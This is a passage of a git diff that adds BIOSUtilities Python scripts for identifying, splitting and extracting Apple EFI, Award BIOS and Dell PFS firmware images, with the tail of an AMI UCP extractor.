nested AMI UCP image after successful extraction + + return nal_dict + +# Get common ctypes Structure Sizes +UAF_HDR_LEN = ctypes.sizeof(UafHeader) +UAF_MOD_LEN = ctypes.sizeof(UafModule) +DIS_HDR_LEN = ctypes.sizeof(DisHeader) +DIS_MOD_LEN = ctypes.sizeof(DisModule) +UII_HDR_LEN = ctypes.sizeof(UiiHeader) + +# AMI UCP Tag Dictionary +UAF_TAG_DICT = { + '@3FI' : ['HpBiosUpdate32.efi', 'HpBiosUpdate32.efi', ''], + '@3S2' : ['HpBiosUpdate32.s12', 'HpBiosUpdate32.s12', ''], + '@3S4' : ['HpBiosUpdate32.s14', 'HpBiosUpdate32.s14', ''], + '@3S9' : ['HpBiosUpdate32.s09', 'HpBiosUpdate32.s09', ''], + '@3SG' : ['HpBiosUpdate32.sig', 'HpBiosUpdate32.sig', ''], + '@AMI' : ['UCP_Nested.bin', 'Nested AMI UCP', ''], + '@B12' : ['BiosMgmt.s12', 'BiosMgmt.s12', ''], + '@B14' : ['BiosMgmt.s14', 'BiosMgmt.s14', ''], + '@B32' : ['BiosMgmt32.s12', 'BiosMgmt32.s12', ''], + '@B34' : ['BiosMgmt32.s14', 'BiosMgmt32.s14', ''], + '@B39' : ['BiosMgmt32.s09', 'BiosMgmt32.s09', ''], + '@B3E' : ['BiosMgmt32.efi', 'BiosMgmt32.efi', ''], + '@BM9' : ['BiosMgmt.s09', 'BiosMgmt.s09', ''], + '@BME' : ['BiosMgmt.efi', 'BiosMgmt.efi', ''], + '@CKV' : ['Check_Version.txt', 'Check Version', 'Text'], + '@CMD' : ['AFU_Command.txt', 'AMI AFU Command', 'Text'], + '@CML' : ['CMOSD4.txt', 'CMOS Item Number-Value (MSI)', 'Text'], + '@CMS' : ['CMOSD4.exe', 'Get or Set CMOS Item (MSI)', ''], + '@CPM' : ['AC_Message.txt', 'Confirm Power Message', ''], + '@DCT' : ['DevCon32.exe', 'Device Console WIN32', ''], + '@DCX' : ['DevCon64.exe', 'Device Console WIN64', ''], + '@DFE' : ['HpDevFwUpdate.efi', 'HpDevFwUpdate.efi', ''], + '@DFS' : ['HpDevFwUpdate.s12', 'HpDevFwUpdate.s12', ''], + '@DIS' : ['Command_Status.bin', 'Default Command Status', ''], + '@ENB' : ['ENBG64.exe', 'ENBG64.exe', ''], + '@HPU' : ['UCP_Main.bin', 'Utility Auxiliary File (HP)', ''], + '@INS' : ['Insyde_Nested.bin', 'Nested Insyde SFX', ''], + '@M32' : ['HpBiosMgmt32.s12', 'HpBiosMgmt32.s12', ''], + '@M34' : ['HpBiosMgmt32.s14', 'HpBiosMgmt32.s14', ''], + '@M39' : ['HpBiosMgmt32.s09', 'HpBiosMgmt32.s09', ''], + '@M3I' : ['HpBiosMgmt32.efi', 'HpBiosMgmt32.efi', ''], + '@MEC' : ['FWUpdLcl.txt', 'Intel FWUpdLcl Command', 'Text'], + '@MED' : ['FWUpdLcl_DOS.exe', 'Intel FWUpdLcl DOS', ''], + '@MET' : ['FWUpdLcl_WIN32.exe', 'Intel FWUpdLcl WIN32', ''], + '@MFI' : ['HpBiosMgmt.efi', 
'HpBiosMgmt.efi', ''], + '@MS2' : ['HpBiosMgmt.s12', 'HpBiosMgmt.s12', ''], + '@MS4' : ['HpBiosMgmt.s14', 'HpBiosMgmt.s14', ''], + '@MS9' : ['HpBiosMgmt.s09', 'HpBiosMgmt.s09', ''], + '@NAL' : ['UCP_List.txt', 'AMI UCP Module Name List', ''], + '@OKM' : ['OK_Message.txt', 'OK Message', ''], + '@PFC' : ['BGT_Command.txt', 'AMI BGT Command', 'Text'], + '@R3I' : ['CryptRSA32.efi', 'CryptRSA32.efi', ''], + '@RFI' : ['CryptRSA.efi', 'CryptRSA.efi', ''], + '@UAF' : ['UCP_Main.bin', 'Utility Auxiliary File (AMI)', ''], + '@UFI' : ['HpBiosUpdate.efi', 'HpBiosUpdate.efi', ''], + '@UII' : ['UCP_Info.txt', 'Utility Identification Information', ''], + '@US2' : ['HpBiosUpdate.s12', 'HpBiosUpdate.s12', ''], + '@US4' : ['HpBiosUpdate.s14', 'HpBiosUpdate.s14', ''], + '@US9' : ['HpBiosUpdate.s09', 'HpBiosUpdate.s09', ''], + '@USG' : ['HpBiosUpdate.sig', 'HpBiosUpdate.sig', ''], + '@VER' : ['OEM_Version.txt', 'OEM Version', 'Text'], + '@VXD' : ['amifldrv.vxd', 'amifldrv.vxd', ''], + '@W32' : ['amifldrv32.sys', 'amifldrv32.sys', ''], + '@W64' : ['amifldrv64.sys', 'amifldrv64.sys', ''], + } + +if __name__ == '__main__': + utility = BIOSUtility(TITLE, is_ami_ucp, ucp_extract) + utility.parse_argument('-c', '--checksum', help='verify AMI UCP Checksums (slow)', action='store_true') + utility.run_utility() diff --git a/blobs/t480/biosutilities/Apple_EFI_ID.py b/blobs/t480/biosutilities/Apple_EFI_ID.py new file mode 100644 index 00000000..1003b676 --- /dev/null +++ b/blobs/t480/biosutilities/Apple_EFI_ID.py @@ -0,0 +1,167 @@ +#!/usr/bin/env python3 +#coding=utf-8 + +""" +Apple EFI ID +Apple EFI Image Identifier +Copyright (C) 2018-2022 Plato Mavropoulos +""" + +TITLE = 'Apple EFI Image Identifier v2.0_a5' + +import os +import sys +import zlib +import struct +import ctypes +import subprocess + +# Stop __pycache__ generation +sys.dont_write_bytecode = True + +from common.externals import get_uefifind_path, get_uefiextract_path +from common.path_ops import del_dirs, path_parent, path_suffixes +from common.patterns import PAT_APPLE_EFI +from common.struct_ops import char, get_struct, uint8_t +from common.system import printer +from common.templates import BIOSUtility +from common.text_ops import file_to_bytes + +class IntelBiosId(ctypes.LittleEndianStructure): + _pack_ = 1 + _fields_ = [ + ('Signature', char*8), # 0x00 + ('BoardID', uint8_t*16), # 0x08 + ('Dot1', uint8_t*2), # 0x18 + ('BoardExt', uint8_t*6), # 0x1A + ('Dot2', uint8_t*2), # 0x20 + ('VersionMajor', uint8_t*8), # 0x22 + ('Dot3', uint8_t*2), # 0x2A + ('BuildType', uint8_t*2), # 0x2C + ('VersionMinor', uint8_t*4), # 0x2E + ('Dot4', uint8_t*2), # 0x32 + ('Year', uint8_t*4), # 0x34 + ('Month', uint8_t*4), # 0x38 + ('Day', uint8_t*4), # 0x3C + ('Hour', uint8_t*4), # 0x40 + ('Minute', uint8_t*4), # 0x44 + ('NullTerminator', uint8_t*2), # 0x48 + # 0x4A + ] + + # https://github.com/tianocore/edk2-platforms/blob/master/Platform/Intel/BoardModulePkg/Include/Guid/BiosId.h + + @staticmethod + def decode(field): + return struct.pack('B' * len(field), *field).decode('utf-16','ignore').strip('\x00 ') + + def get_bios_id(self): + BoardID = self.decode(self.BoardID) + BoardExt = self.decode(self.BoardExt) + VersionMajor = self.decode(self.VersionMajor) + BuildType = self.decode(self.BuildType) + VersionMinor = self.decode(self.VersionMinor) + BuildDate = f'20{self.decode(self.Year)}-{self.decode(self.Month)}-{self.decode(self.Day)}' + BuildTime = f'{self.decode(self.Hour)}-{self.decode(self.Minute)}' + + return BoardID, BoardExt, VersionMajor, BuildType, VersionMinor, 
BuildDate, BuildTime + + def struct_print(self, p): + BoardID,BoardExt,VersionMajor,BuildType,VersionMinor,BuildDate,BuildTime = self.get_bios_id() + + printer(['Intel Signature:', self.Signature.decode('utf-8')], p, False) + printer(['Board Identity: ', BoardID], p, False) + printer(['Apple Identity: ', BoardExt], p, False) + printer(['Major Version: ', VersionMajor], p, False) + printer(['Minor Version: ', VersionMinor], p, False) + printer(['Build Type: ', BuildType], p, False) + printer(['Build Date: ', BuildDate], p, False) + printer(['Build Time: ', BuildTime.replace('-',':')], p, False) + +# Check if input is Apple EFI image +def is_apple_efi(input_file): + input_buffer = file_to_bytes(input_file) + + if PAT_APPLE_EFI.search(input_buffer): + return True + + if not os.path.isfile(input_file): + return False + + try: + _ = subprocess.run([get_uefifind_path(), input_file, 'body', 'list', PAT_UEFIFIND], + check=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) + + return True + except Exception: + return False + +# Parse & Identify (or Rename) Apple EFI image +def apple_efi_identify(input_file, extract_path, padding=0, rename=False): + if not os.path.isfile(input_file): + printer('Error: Could not find input file path!', padding) + + return 1 + + input_buffer = file_to_bytes(input_file) + + bios_id_match = PAT_APPLE_EFI.search(input_buffer) # Detect $IBIOSI$ pattern + + if bios_id_match: + bios_id_res = f'0x{bios_id_match.start():X}' + + bios_id_hdr = get_struct(input_buffer, bios_id_match.start(), IntelBiosId) + else: + # The $IBIOSI$ pattern is within EFI compressed modules so we need to use UEFIFind and UEFIExtract + try: + bios_id_res = subprocess.check_output([get_uefifind_path(), input_file, 'body', 'list', PAT_UEFIFIND], + text=True)[:36] + + del_dirs(extract_path) # UEFIExtract must create its output folder itself, make sure it is not present + + _ = subprocess.run([get_uefiextract_path(), input_file, bios_id_res, '-o', extract_path, '-m', 'body'], + check=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) + + with open(os.path.join(extract_path, 'body.bin'), 'rb') as raw_body: + body_buffer = raw_body.read() + + bios_id_match = PAT_APPLE_EFI.search(body_buffer) # Detect decompressed $IBIOSI$ pattern + + bios_id_hdr = get_struct(body_buffer, bios_id_match.start(), IntelBiosId) + + del_dirs(extract_path) # Successful UEFIExtract extraction, remove its output (temp) folder + except Exception: + printer('Error: Failed to parse compressed $IBIOSI$ pattern!', padding) + + return 2 + + printer(f'Detected $IBIOSI$ at {bios_id_res}\n', padding) + + bios_id_hdr.struct_print(padding + 4) + + if rename: + input_parent = path_parent(input_file) + + input_suffix = path_suffixes(input_file)[-1] + + input_adler32 = zlib.adler32(input_buffer) + + ID,Ext,Major,Type,Minor,Date,Time = bios_id_hdr.get_bios_id() + + output_name = f'{ID}_{Ext}_{Major}_{Type}{Minor}_{Date}_{Time}_{input_adler32:08X}{input_suffix}' + + output_file = os.path.join(input_parent, output_name) + + if not os.path.isfile(output_file): + os.replace(input_file, output_file) # Rename input file based on its EFI tag + + printer(f'Renamed to {output_name}', padding) + + return 0 + +PAT_UEFIFIND = f'244942494F534924{"."*32}2E00{"."*12}2E00{"."*16}2E00{"."*12}2E00{"."*40}0000' + +if __name__ == '__main__': + utility = BIOSUtility(TITLE, is_apple_efi, apple_efi_identify) + utility.parse_argument('-r', '--rename', help='rename EFI image based on its tag', action='store_true') + utility.run_utility() diff --git 
a/blobs/t480/biosutilities/Apple_EFI_IM4P.py b/blobs/t480/biosutilities/Apple_EFI_IM4P.py new file mode 100644 index 00000000..5dceefa3 --- /dev/null +++ b/blobs/t480/biosutilities/Apple_EFI_IM4P.py @@ -0,0 +1,145 @@ +#!/usr/bin/env python3 +#coding=utf-8 + +""" +Apple EFI IM4P +Apple EFI IM4P Splitter +Copyright (C) 2018-2022 Plato Mavropoulos +""" + +TITLE = 'Apple EFI IM4P Splitter v3.0_a5' + +import os +import sys + +# Stop __pycache__ generation +sys.dont_write_bytecode = True + +from common.path_ops import make_dirs, path_stem +from common.patterns import PAT_APPLE_IM4P, PAT_INTEL_IFD +from common.system import printer +from common.templates import BIOSUtility +from common.text_ops import file_to_bytes + +# Check if input is Apple EFI IM4P image +def is_apple_im4p(input_file): + input_buffer = file_to_bytes(input_file) + + is_im4p = PAT_APPLE_IM4P.search(input_buffer) + + is_ifd = PAT_INTEL_IFD.search(input_buffer) + + return bool(is_im4p and is_ifd) + +# Parse & Split Apple EFI IM4P image +def apple_im4p_split(input_file, extract_path, padding=0): + exit_codes = [] + + input_buffer = file_to_bytes(input_file) + + make_dirs(extract_path, delete=True) + + # Detect IM4P EFI pattern + im4p_match = PAT_APPLE_IM4P.search(input_buffer) + + # After IM4P mefi (0x15), multi EFI payloads have _MEFIBIN (0x100) but is difficult to RE w/o varying samples. + # However, _MEFIBIN is not required for splitting SPI images due to Intel Flash Descriptor Components Density. + + # IM4P mefi payload start offset + mefi_data_bgn = im4p_match.start() + input_buffer[im4p_match.start() - 0x1] + + # IM4P mefi payload size + mefi_data_len = int.from_bytes(input_buffer[im4p_match.end() + 0x5:im4p_match.end() + 0x9], 'big') + + # Check if mefi is followed by _MEFIBIN + mefibin_exist = input_buffer[mefi_data_bgn:mefi_data_bgn + 0x8] == b'_MEFIBIN' + + # Actual multi EFI payloads start after _MEFIBIN + efi_data_bgn = mefi_data_bgn + 0x100 if mefibin_exist else mefi_data_bgn + + # Actual multi EFI payloads size without _MEFIBIN + efi_data_len = mefi_data_len - 0x100 if mefibin_exist else mefi_data_len + + # Adjust input file buffer to actual multi EFI payloads data + input_buffer = input_buffer[efi_data_bgn:efi_data_bgn + efi_data_len] + + # Parse Intel Flash Descriptor pattern matches + for ifd in PAT_INTEL_IFD.finditer(input_buffer): + # Component Base Address from FD start (ICH8-ICH10 = 1, IBX = 2, CPT+ = 3) + ifd_flmap0_fcba = input_buffer[ifd.start() + 0x4] * 0x10 + + # I/O Controller Hub (ICH) + if ifd_flmap0_fcba == 0x10: + # At ICH, Flash Descriptor starts at 0x0 + ifd_bgn_substruct = 0x0 + + # 0xBC for [0xAC] + 0xFF * 16 sanity check + ifd_end_substruct = 0xBC + + # Platform Controller Hub (PCH) + else: + # At PCH, Flash Descriptor starts at 0x10 + ifd_bgn_substruct = 0x10 + + # 0xBC for [0xAC] + 0xFF * 16 sanity check + ifd_end_substruct = 0xBC + + # Actual Flash Descriptor Start Offset + ifd_match_start = ifd.start() - ifd_bgn_substruct + + # Actual Flash Descriptor End Offset + ifd_match_end = ifd.end() - ifd_end_substruct + + # Calculate Intel Flash Descriptor Flash Component Total Size + + # Component Count (00 = 1, 01 = 2) + ifd_flmap0_nc = ((int.from_bytes(input_buffer[ifd_match_end:ifd_match_end + 0x4], 'little') >> 8) & 3) + 1 + + # PCH/ICH Strap Length (ME 2-8 & TXE 0-2 & SPS 1-2 <= 0x12, ME 9+ & TXE 3+ & SPS 3+ >= 0x13) + ifd_flmap1_isl = input_buffer[ifd_match_end + 0x7] + + # Component Density Byte (ME 2-8 & TXE 0-2 & SPS 1-2 = 0:5, ME 9+ & TXE 3+ & SPS 3+ = 0:7) + ifd_comp_den = 
input_buffer[ifd_match_start + ifd_flmap0_fcba] + + # Component 1 Density Bits (ME 2-8 & TXE 0-2 & SPS 1-2 = 3, ME 9+ & TXE 3+ & SPS 3+ = 4) + ifd_comp_1_bitwise = 0xF if ifd_flmap1_isl >= 0x13 else 0x7 + + # Component 2 Density Bits (ME 2-8 & TXE 0-2 & SPS 1-2 = 3, ME 9+ & TXE 3+ & SPS 3+ = 4) + ifd_comp_2_bitwise = 0x4 if ifd_flmap1_isl >= 0x13 else 0x3 + + # Component 1 Density (FCBA > C0DEN) + ifd_comp_all_size = IFD_COMP_LEN[ifd_comp_den & ifd_comp_1_bitwise] + + # Component 2 Density (FCBA > C1DEN) + if ifd_flmap0_nc == 2: + ifd_comp_all_size += IFD_COMP_LEN[ifd_comp_den >> ifd_comp_2_bitwise] + + ifd_data_bgn = ifd_match_start + ifd_data_end = ifd_data_bgn + ifd_comp_all_size + ifd_data_txt = f'0x{ifd_data_bgn:07X}-0x{ifd_data_end:07X}' + + output_data = input_buffer[ifd_data_bgn:ifd_data_end] + + output_size = len(output_data) + + output_name = path_stem(input_file) if os.path.isfile(input_file) else 'Part' + + output_path = os.path.join(extract_path, f'{output_name}_[{ifd_data_txt}].fd') + + with open(output_path, 'wb') as output_image: + output_image.write(output_data) + + printer(f'Split Apple EFI image at {ifd_data_txt}!', padding) + + if output_size != ifd_comp_all_size: + printer(f'Error: Bad image size 0x{output_size:07X}, expected 0x{ifd_comp_all_size:07X}!', padding + 4) + + exit_codes.append(1) + + return sum(exit_codes) + +# Intel Flash Descriptor Component Sizes (4MB, 8MB, 16MB and 32MB) +IFD_COMP_LEN = {3: 0x400000, 4: 0x800000, 5: 0x1000000, 6: 0x2000000} + +if __name__ == '__main__': + BIOSUtility(TITLE, is_apple_im4p, apple_im4p_split).run_utility() diff --git a/blobs/t480/biosutilities/Apple_EFI_PBZX.py b/blobs/t480/biosutilities/Apple_EFI_PBZX.py new file mode 100644 index 00000000..8e4f5536 --- /dev/null +++ b/blobs/t480/biosutilities/Apple_EFI_PBZX.py @@ -0,0 +1,118 @@ +#!/usr/bin/env python3 +#coding=utf-8 + +""" +Apple PBZX Extract +Apple EFI PBZX Extractor +Copyright (C) 2021-2022 Plato Mavropoulos +""" + +TITLE = 'Apple EFI PBZX Extractor v1.0_a5' + +import os +import sys +import lzma +import ctypes + +# Stop __pycache__ generation +sys.dont_write_bytecode = True + +from common.comp_szip import is_szip_supported, szip_decompress +from common.path_ops import make_dirs, path_stem +from common.patterns import PAT_APPLE_PBZX +from common.struct_ops import get_struct, uint32_t +from common.system import printer +from common.templates import BIOSUtility +from common.text_ops import file_to_bytes + +class PbzxChunk(ctypes.BigEndianStructure): + _pack_ = 1 + _fields_ = [ + ('Reserved0', uint32_t), # 0x00 + ('InitSize', uint32_t), # 0x04 + ('Reserved1', uint32_t), # 0x08 + ('CompSize', uint32_t), # 0x0C + # 0x10 + ] + + def struct_print(self, p): + printer(['Reserved 0 :', f'0x{self.Reserved0:X}'], p, False) + printer(['Initial Size :', f'0x{self.InitSize:X}'], p, False) + printer(['Reserved 1 :', f'0x{self.Reserved1:X}'], p, False) + printer(['Compressed Size:', f'0x{self.CompSize:X}'], p, False) + +# Check if input is Apple PBZX image +def is_apple_pbzx(input_file): + input_buffer = file_to_bytes(input_file) + + return bool(PAT_APPLE_PBZX.search(input_buffer[:0x4])) + +# Parse & Extract Apple PBZX image +def apple_pbzx_extract(input_file, extract_path, padding=0): + input_buffer = file_to_bytes(input_file) + + make_dirs(extract_path, delete=True) + + cpio_bin = b'' # Initialize PBZX > CPIO Buffer + cpio_len = 0x0 # Initialize PBZX > CPIO Length + + chunk_off = 0xC # First PBZX Chunk starts at 0xC + while chunk_off < len(input_buffer): + chunk_hdr = 
get_struct(input_buffer, chunk_off, PbzxChunk) + + printer(f'PBZX Chunk at 0x{chunk_off:08X}\n', padding) + + chunk_hdr.struct_print(padding + 4) + + # PBZX Chunk data starts after its Header + comp_bgn = chunk_off + PBZX_CHUNK_HDR_LEN + + # To avoid a potential infinite loop, double-check Compressed Size + comp_end = comp_bgn + max(chunk_hdr.CompSize, PBZX_CHUNK_HDR_LEN) + + comp_bin = input_buffer[comp_bgn:comp_end] + + try: + # Attempt XZ decompression, if applicable to Chunk data + cpio_bin += lzma.LZMADecompressor().decompress(comp_bin) + + printer('Successful LZMA decompression!', padding + 8) + except Exception: + # Otherwise, Chunk data is not compressed + cpio_bin += comp_bin + + # Final CPIO size should match the sum of all Chunks > Initial Size + cpio_len += chunk_hdr.InitSize + + # Next Chunk starts at the end of current Chunk's data + chunk_off = comp_end + + # Check that CPIO size is valid based on all Chunks > Initial Size + if cpio_len != len(cpio_bin): + printer('Error: Unexpected CPIO archive size!', padding) + + return 1 + + cpio_name = path_stem(input_file) if os.path.isfile(input_file) else 'Payload' + + cpio_path = os.path.join(extract_path, f'{cpio_name}.cpio') + + with open(cpio_path, 'wb') as cpio_object: + cpio_object.write(cpio_bin) + + # Decompress PBZX > CPIO archive with 7-Zip + if is_szip_supported(cpio_path, padding, args=['-tCPIO'], check=True): + if szip_decompress(cpio_path, extract_path, 'CPIO', padding, args=['-tCPIO'], check=True) == 0: + os.remove(cpio_path) # Successful extraction, delete PBZX > CPIO archive + else: + return 3 + else: + return 2 + + return 0 + +# Get common ctypes Structure Sizes +PBZX_CHUNK_HDR_LEN = ctypes.sizeof(PbzxChunk) + +if __name__ == '__main__': + BIOSUtility(TITLE, is_apple_pbzx, apple_pbzx_extract).run_utility() diff --git a/blobs/t480/biosutilities/Apple_EFI_PKG.py b/blobs/t480/biosutilities/Apple_EFI_PKG.py new file mode 100644 index 00000000..a185547d --- /dev/null +++ b/blobs/t480/biosutilities/Apple_EFI_PKG.py @@ -0,0 +1,148 @@ +#!/usr/bin/env python3 +#coding=utf-8 + +""" +Apple EFI PKG +Apple EFI Package Extractor +Copyright (C) 2019-2022 Plato Mavropoulos +""" + +TITLE = 'Apple EFI Package Extractor v2.0_a5' + +import os +import sys + +# Stop __pycache__ generation +sys.dont_write_bytecode = True + +from common.comp_szip import is_szip_supported, szip_decompress +from common.path_ops import copy_file, del_dirs, get_path_files, make_dirs, path_name, path_parent, get_extract_path +from common.patterns import PAT_APPLE_PKG +from common.system import printer +from common.templates import BIOSUtility +from common.text_ops import file_to_bytes + +from Apple_EFI_ID import apple_efi_identify, is_apple_efi +from Apple_EFI_IM4P import apple_im4p_split, is_apple_im4p +from Apple_EFI_PBZX import apple_pbzx_extract, is_apple_pbzx + +# Check if input is Apple EFI PKG package +def is_apple_pkg(input_file): + input_buffer = file_to_bytes(input_file) + + return bool(PAT_APPLE_PKG.search(input_buffer[:0x4])) + +# Split Apple EFI image (if applicable) and Rename +def efi_split_rename(in_file, out_path, padding=0): + exit_codes = [] + + working_dir = get_extract_path(in_file) + + if is_apple_im4p(in_file): + printer(f'Splitting IM4P via {is_apple_im4p.__module__}...', padding) + im4p_exit = apple_im4p_split(in_file, working_dir, padding + 4) + exit_codes.append(im4p_exit) + else: + make_dirs(working_dir, delete=True) + copy_file(in_file, working_dir, True) + + for efi_file in get_path_files(working_dir): + if is_apple_efi(efi_file): 
+ printer(f'Renaming EFI via {is_apple_efi.__module__}...', padding) + name_exit = apple_efi_identify(efi_file, efi_file, padding + 4, True) + exit_codes.append(name_exit) + + for named_file in get_path_files(working_dir): + copy_file(named_file, out_path, True) + + del_dirs(working_dir) + + return sum(exit_codes) + +# Parse & Extract Apple EFI PKG packages +def apple_pkg_extract(input_file, extract_path, padding=0): + if not os.path.isfile(input_file): + printer('Error: Could not find input file path!', padding) + return 1 + + make_dirs(extract_path, delete=True) + + xar_path = os.path.join(extract_path, 'xar') + + # Decompress PKG > XAR archive with 7-Zip + if is_szip_supported(input_file, padding, args=['-tXAR'], check=True): + if szip_decompress(input_file, xar_path, 'XAR', padding, args=['-tXAR'], check=True) != 0: + return 3 + else: + return 2 + + for xar_file in get_path_files(xar_path): + if path_name(xar_file) == 'Payload': + pbzx_module = is_apple_pbzx.__module__ + if is_apple_pbzx(xar_file): + printer(f'Extracting PBZX via {pbzx_module}...', padding + 4) + pbzx_path = get_extract_path(xar_file) + if apple_pbzx_extract(xar_file, pbzx_path, padding + 8) == 0: + printer(f'Succesfull PBZX extraction via {pbzx_module}!', padding + 4) + for pbzx_file in get_path_files(pbzx_path): + if path_name(pbzx_file) == 'UpdateBundle.zip': + if is_szip_supported(pbzx_file, padding + 8, args=['-tZIP'], check=True): + zip_path = get_extract_path(pbzx_file) + if szip_decompress(pbzx_file, zip_path, 'ZIP', padding + 8, args=['-tZIP'], check=True) == 0: + for zip_file in get_path_files(zip_path): + if path_name(path_parent(zip_file)) == 'MacEFI': + printer(path_name(zip_file), padding + 12) + if efi_split_rename(zip_file, extract_path, padding + 16) != 0: + printer(f'Error: Could not split and rename {path_name(zip_file)}!', padding) + return 10 + else: + return 9 + else: + return 8 + break # ZIP found, stop + else: + printer('Error: Could not find "UpdateBundle.zip" file!', padding) + return 7 + else: + printer(f'Error: Failed to extract PBZX file via {pbzx_module}!', padding) + return 6 + else: + printer(f'Error: Failed to detect file as PBZX via {pbzx_module}!', padding) + return 5 + + break # Payload found, stop searching + + if path_name(xar_file) == 'Scripts': + if is_szip_supported(xar_file, padding + 4, args=['-tGZIP'], check=True): + gzip_path = get_extract_path(xar_file) + if szip_decompress(xar_file, gzip_path, 'GZIP', padding + 4, args=['-tGZIP'], check=True) == 0: + for gzip_file in get_path_files(gzip_path): + if is_szip_supported(gzip_file, padding + 8, args=['-tCPIO'], check=True): + cpio_path = get_extract_path(gzip_file) + if szip_decompress(gzip_file, cpio_path, 'CPIO', padding + 8, args=['-tCPIO'], check=True) == 0: + for cpio_file in get_path_files(cpio_path): + if path_name(path_parent(cpio_file)) == 'EFIPayloads': + printer(path_name(cpio_file), padding + 12) + if efi_split_rename(cpio_file, extract_path, padding + 16) != 0: + printer(f'Error: Could not split and rename {path_name(cpio_file)}!', padding) + return 15 + else: + return 14 + else: + return 13 + else: + return 12 + else: + return 11 + + break # Scripts found, stop searching + else: + printer('Error: Could not find "Payload" or "Scripts" file!', padding) + return 4 + + del_dirs(xar_path) # Delete temporary/working XAR folder + + return 0 + +if __name__ == '__main__': + BIOSUtility(TITLE, is_apple_pkg, apple_pkg_extract).run_utility() diff --git a/blobs/t480/biosutilities/Award_BIOS_Extract.py 
b/blobs/t480/biosutilities/Award_BIOS_Extract.py new file mode 100644 index 00000000..12d1e969 --- /dev/null +++ b/blobs/t480/biosutilities/Award_BIOS_Extract.py @@ -0,0 +1,74 @@ +#!/usr/bin/env python3 +#coding=utf-8 + +""" +Award BIOS Extract +Award BIOS Module Extractor +Copyright (C) 2018-2022 Plato Mavropoulos +""" + +TITLE = 'Award BIOS Module Extractor v2.0_a5' + +import os +import sys + +# Stop __pycache__ generation +sys.dont_write_bytecode = True + +from common.comp_szip import szip_decompress +from common.path_ops import make_dirs, safe_name, get_extract_path +from common.patterns import PAT_AWARD_LZH +from common.system import printer +from common.templates import BIOSUtility +from common.text_ops import file_to_bytes + +# Check if input is Award BIOS image +def is_award_bios(in_file): + in_buffer = file_to_bytes(in_file) + + return bool(PAT_AWARD_LZH.search(in_buffer)) + +# Parse & Extract Award BIOS image +def award_bios_extract(input_file, extract_path, padding=0): + input_buffer = file_to_bytes(input_file) + + make_dirs(extract_path, delete=True) + + for lzh_match in PAT_AWARD_LZH.finditer(input_buffer): + lzh_type = lzh_match.group(0).decode('utf-8') + lzh_text = f'LZH-{lzh_type.strip("-").upper()}' + + lzh_bgn = lzh_match.start() + + mod_bgn = lzh_bgn - 0x2 + hdr_len = input_buffer[mod_bgn] + mod_len = int.from_bytes(input_buffer[mod_bgn + 0x7:mod_bgn + 0xB], 'little') + mod_end = lzh_bgn + hdr_len + mod_len + mod_bin = input_buffer[mod_bgn:mod_end] + + tag_bgn = mod_bgn + 0x16 + tag_end = tag_bgn + input_buffer[mod_bgn + 0x15] + tag_txt = input_buffer[tag_bgn:tag_end].decode('utf-8','ignore') + + printer(f'{lzh_text} > {tag_txt} [0x{mod_bgn:06X}-0x{mod_end:06X}]', padding) + + mod_path = os.path.join(extract_path, safe_name(tag_txt)) + lzh_path = f'{mod_path}.lzh' + + with open(lzh_path, 'wb') as lzh_file: + lzh_file.write(mod_bin) # Store LZH archive + + # 7-Zip returns critical exit code (i.e. 
2) if LZH CRC is wrong, do not check result + szip_decompress(lzh_path, extract_path, lzh_text, padding + 4, check=False) + + # Manually check if 7-Zip extracted LZH due to its CRC check issue + if os.path.isfile(mod_path): + os.remove(lzh_path) # Successful extraction, delete LZH archive + + # Extract any nested LZH archives + if is_award_bios(mod_path): + # Recursively extract nested Award BIOS modules + award_bios_extract(mod_path, get_extract_path(mod_path), padding + 8) + +if __name__ == '__main__': + BIOSUtility(TITLE, is_award_bios, award_bios_extract).run_utility() diff --git a/blobs/t480/biosutilities/Dell_PFS_Extract.py b/blobs/t480/biosutilities/Dell_PFS_Extract.py new file mode 100644 index 00000000..b8cb6865 --- /dev/null +++ b/blobs/t480/biosutilities/Dell_PFS_Extract.py @@ -0,0 +1,1067 @@ +#!/usr/bin/env python3 +#coding=utf-8 + +""" +Dell PFS Extract +Dell PFS Update Extractor +Copyright (C) 2018-2022 Plato Mavropoulos +""" + +TITLE = 'Dell PFS Update Extractor v6.0_a16' + +import os +import io +import sys +import lzma +import zlib +import ctypes +import contextlib + +# Skip __pycache__ generation +sys.dont_write_bytecode = True + +from common.checksums import get_chk_8_xor +from common.comp_szip import is_szip_supported, szip_decompress +from common.num_ops import get_ordinal +from common.path_ops import del_dirs, get_path_files, make_dirs, path_name, path_parent, path_stem, safe_name +from common.patterns import PAT_DELL_FTR, PAT_DELL_HDR, PAT_DELL_PKG +from common.struct_ops import char, get_struct, uint8_t, uint16_t, uint32_t, uint64_t +from common.system import printer +from common.templates import BIOSUtility +from common.text_ops import file_to_bytes + +from AMI_PFAT_Extract import IntelBiosGuardHeader, IntelBiosGuardSignature2k, parse_bg_script + +# Dell PFS Header Structure +class DellPfsHeader(ctypes.LittleEndianStructure): + _pack_ = 1 + _fields_ = [ + ('Tag', char*8), # 0x00 + ('HeaderVersion', uint32_t), # 0x08 + ('PayloadSize', uint32_t), # 0x0C + # 0x10 + ] + + def struct_print(self, p): + printer(['Header Tag :', self.Tag.decode('utf-8')], p, False) + printer(['Header Version:', self.HeaderVersion], p, False) + printer(['Payload Size :', f'0x{self.PayloadSize:X}'], p, False) + +# Dell PFS Footer Structure +class DellPfsFooter(ctypes.LittleEndianStructure): + _pack_ = 1 + _fields_ = [ + ('PayloadSize', uint32_t), # 0x00 + ('Checksum', uint32_t), # 0x04 ~CRC32 w/ Vector 0 + ('Tag', char*8), # 0x08 + # 0x10 + ] + + def struct_print(self, p): + printer(['Payload Size :', f'0x{self.PayloadSize:X}'], p, False) + printer(['Payload Checksum:', f'0x{self.Checksum:08X}'], p, False) + printer(['Footer Tag :', self.Tag.decode('utf-8')], p, False) + +# Dell PFS Entry Base Structure +class DellPfsEntryBase(ctypes.LittleEndianStructure): + _pack_ = 1 + _fields_ = [ + ('GUID', uint32_t*4), # 0x00 Little Endian + ('HeaderVersion', uint32_t), # 0x10 1 or 2 + ('VersionType', uint8_t*4), # 0x14 + ('Version', uint16_t*4), # 0x18 + ('Reserved', uint64_t), # 0x20 + ('DataSize', uint32_t), # 0x28 + ('DataSigSize', uint32_t), # 0x2C + ('DataMetSize', uint32_t), # 0x30 + ('DataMetSigSize', uint32_t), # 0x34 + # 0x38 (parent class, base) + ] + + def struct_print(self, p): + GUID = f'{int.from_bytes(self.GUID, "little"):0{0x10 * 2}X}' + 